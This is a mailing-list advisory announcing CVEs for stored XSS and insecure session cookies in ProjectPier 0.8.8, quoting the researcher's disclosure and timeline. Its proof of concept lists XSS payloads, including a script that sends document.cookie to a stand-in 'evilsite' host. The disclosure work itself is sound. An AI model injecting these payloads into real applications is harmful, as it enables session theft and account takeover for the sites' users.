Mitre has assigned the following CVE's for these issues in Project Pier: XSS: CVE-2013-3635 Session cookies lack HttpOnly flag: CVE-2013-3636 Session cookies lack Secure flag: CVE-2013-3637 On Tue, May 21, 2013 at 9:26 PM, the infinitenigma <theinfinitenigma@xxxxxxxxx> wrote: > Summary > -------------------- > Software : ProjectPier > Version : 0.8.8 (other versions untested) > Website : http://www.projectpier.org > Issue : XSS (stored), Insecure Cookie storage > CVSS Base : (AV:N/AC:M/Au:S/C:C/I:C/A:N) > CVSS Score: 7.9 > Researcher: Carl Benedict > > Product Description > -------------------- > ProjectPier is a Free, Open-Source, PHP web application for managing > tasks, projects and teams through an intuitive web interface. > > Details > -------------------- > The ProjectPier web application is affected by stored XSS and insecure > cookie storage. The combination of these two vulnerabilities can lead > to full compromise of application credentials by stealing session > cookies. > > The stored XSS can be found in the Contact Name, Contact Company Name, > Contact Description fields. > > Proof of Concept > -------------------- > > Enter any of the following strings into the Contact Name, Contact > Company Name, and Company Description fields will generate a > JavaScript alert dialog when viewing Contacts: > > <script>alert(1)</script> > > %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e > > Cookie insecurity: > > The session cookies are not protected by the HttpOnly or Secure flags, > allowing them to be accessed via JavaScript and sent over HTTP. > > Basic JavaScript alert, returning cookie values: > > <script>alert(document.cookie)</script> > > JavaScript that sends all cookie values to 'http://evilsite' for > logging and reuse on the attacker side: > > <script>var url1 = "<img src=http://evilsite/"; + > encodeURIComponent(document.cookie) + ">"; document.writeln(url1); > </script> > > History > -------------------- > 11/07/2012 : Initial contact > 11/07/2012 : Vendor response. Fix planned > 11/12/2012 : Update requested > 05/21/2013 : No updates. Advisory released > > References > -------------------- > Bug Report : http://www.projectpier.org/node/4520 > Screen Shot: http://www.projectpier.org/files/issues/ppci.jpg > Screen Shot: http://www.projectpier.org/files/issues/ppci2.jpg > Screen Shot: http://www.projectpier.org/files/issues/ppxss.jpg > > > -- > ∞ -- ∞
